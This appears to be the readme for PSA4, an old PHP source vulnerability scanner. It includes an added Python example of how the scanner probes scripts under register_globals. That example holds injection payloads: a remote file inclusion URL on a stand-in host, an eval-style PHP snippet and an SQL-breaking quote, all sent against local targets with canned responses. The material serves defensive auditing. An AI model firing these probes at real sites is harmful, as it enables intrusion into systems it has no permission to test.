PSA4
About
PHP Source Auditor 4 (PSA4) is made for quickly finding
(obvious) vulnerabilities in PHP source code. It can be
used by webmasters, developers or anyone interested in security.
Note: it has not been tested very well and bugs may occur;
please e-mail me (my address is below) if you find any or
have ideas to improve this piece of software. The detection
of SQL injection is poor, and sometimes the application
starts reporting RCE everywhere; that is the fault of Easy-PHP! :(
Usage
The application has the following requirements to function properly:
- A local PHP web server on which you can set register_globals = On in php.ini
  (I recommend Easy-PHP 1.8, or Apache on Linux)
- The source code of the PHP application you want to scan.
- A Perl interpreter (e.g. ActivePerl if you're on Windows) with the Perl/Tk (Tk)
  and LWP::UserAgent modules installed.
Once these requirements are met, copy the PHP source you
want to scan into the folder that is your document root,
for example www or public_html. Because register_globals = On
lets any request parameter overwrite a script's variables, and
the scan deliberately drives the application with attack payloads,
run this web server on an isolated machine or VM that is not
reachable from the network and hosts nothing else.
With the web server running, start the scanner with your
Perl interpreter; if everything went well you should now
have a GUI window with some instructions. Do a "Test Run"
and check whether it reports any errors; if not, start the scan by
clicking "Scan". The application will appear frozen, but
after some time a list of vulnerabilities (if any) will
appear next to the menu. Select a vulnerability and click
"detailed" for more information. In the file "results.html"
you will find a brief report on all vulnerabilities found;
in the file "archive.txt" you will find all vulnerabilities
(just the URLs) you have ever found.
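To make concrete what a scan of this kind does, and why it needs register_globals = On, here is an added example of the request-and-match loop in Python. It is not PSA4's own Perl code and does not claim to mirror its internals. With register_globals on, every query-string key becomes a PHP variable inside the requested script, so a probe can assign a candidate variable a remote include URL, a snippet of PHP, or a lone quote, and the response shows whether the value was included, evaluated, merely echoed, or pasted into a broken SQL query. The host scanner.example, the probe.txt file, the probe expression, the SQL error signatures, the script/variable targets and the canned responses are all assumptions constructed for the example; the real fetcher is meant to be pointed at your own isolated scan server.

```python
"""Offline model of a register_globals-driven PHP probe loop (added example, not PSA4 code)."""
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import urlencode
from urllib.request import urlopen

# Arithmetic the probe asks PHP to evaluate. The literal expression never occurs in a
# normal page, and its result only shows up if the injected code actually ran.
PROBE_EXPR = "1337*4242"
PROBE_VALUE = str(1337 * 4242)          # "5671554"

# Hypothetical host (assumption) serving a file containing "<?php echo 1337*4242; ?>".
# With register_globals = On, ?page=<this> reaches a line like include($page . '.php');
# the trailing '?' turns the appended '.php' into a harmless query string.
RFI_HOST = "http://scanner.example/probe.txt?"

# Error strings that betray a query built from an unsanitised variable (assumed set).
SQL_ERROR_SIGNATURES = [
    r"You have an error in your SQL syntax",
    r"supplied argument is not a valid MySQL result",
    r"Warning: mysql_(?:query|fetch_\w+)\(\)",
]


def build_probe_url(base: str, script: str, param: str, payload: str) -> str:
    """URL that, with register_globals = On, assigns `payload` to $param inside `script`."""
    return f"{base.rstrip('/')}/{script.lstrip('/')}?{urlencode({param: payload})}"


def classify(body: str) -> str:
    """Decide what one response tells us about the variable under test."""
    if PROBE_VALUE in body:
        return "rce"          # PHP evaluated our code (remote include or eval)
    if any(re.search(sig, body) for sig in SQL_ERROR_SIGNATURES):
        return "sqli"         # our value broke a query
    if PROBE_EXPR in body or RFI_HOST in body:
        return "reflected"    # echoed verbatim only: not execution, do not report as RCE
    return "clean"


def http_fetch(url: str) -> str:
    """Real fetcher, for use against the isolated local scan server."""
    with urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def scan(base: str, targets: Dict[str, List[str]],
         fetch: Callable[[str], str] = http_fetch) -> List[Tuple[str, str, str]]:
    """targets maps script path -> candidate variable names (harvested from the source).
    Returns (script, variable, verdict) for every confirmed hit."""
    payloads = [RFI_HOST, f"echo {PROBE_EXPR};", "'"]   # RFI, eval-style, SQL break
    findings: List[Tuple[str, str, str]] = []
    for script, params in targets.items():
        for param in params:
            verdicts = {classify(fetch(build_probe_url(base, script, param, p))) for p in payloads}
            for verdict in ("rce", "sqli"):
                if verdict in verdicts:
                    findings.append((script, param, verdict))
    return findings


# Constructed responses standing in for a local server, so the example runs offline.
FAKE_SERVER = {
    "/inc.php?page=http%3A%2F%2Fscanner.example%2Fprobe.txt%3F":
        "header\n5671554\nfooter",                          # remote file was included
    "/news.php?id=%27":
        "Warning: mysql_query() ... You have an error in your SQL syntax",
    "/echo.php?msg=echo+1337%2A4242%3B":
        "<p>You said: echo 1337*4242;</p>",                 # reflected, not executed
}


def fake_fetch(url: str) -> str:
    base = "http://localhost"
    path = url[len(base):] if url.startswith(base) else url
    return FAKE_SERVER.get(path, "")


if __name__ == "__main__":
    targets = {"inc.php": ["page"], "news.php": ["id"], "echo.php": ["msg"]}
    for hit in scan("http://localhost", targets, fetch=fake_fetch):
        print(hit)
```

The check in classify is what keeps an echoed payload from being counted as code execution: the scanner only claims RCE when it sees the evaluated value 5671554, never when it sees the expression it sent. Any page that prints its input back will otherwise look like an RCE.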
To do
Nothing, I hope. This version is final; I'm done writing this crap.
Credits & Thanks
All the design & programming is the result of
Iron having a bad day. The idea is powered by Stansar from
RootShell Security Group. Thanks and greets fly to everyone who didn't leak it, tested it,
contributed ideas or information, helped me out when I was tired of my sucky coding,
amused me when I was dead-bored, and especially to all the people who visit randombase.com!
Q & A
PSA4? Where is PSA1 & PSA2 & PSA3?
The tool was written for a 'private' audience; those versions weren't as
'cool' as this one, in case you feel bad about not having seen them. PSA1 was
nothing more than a powerful remote file inclusion (RFI) scanner, while PSA2
combined more features in a bad design.
PSA3 was the first version to actually be released, but was, erm, buggy.
I have a question, where do I go?
You can mail me at i@randombase.com or, maybe better,
post your question at the RandomBase forums or at my blog.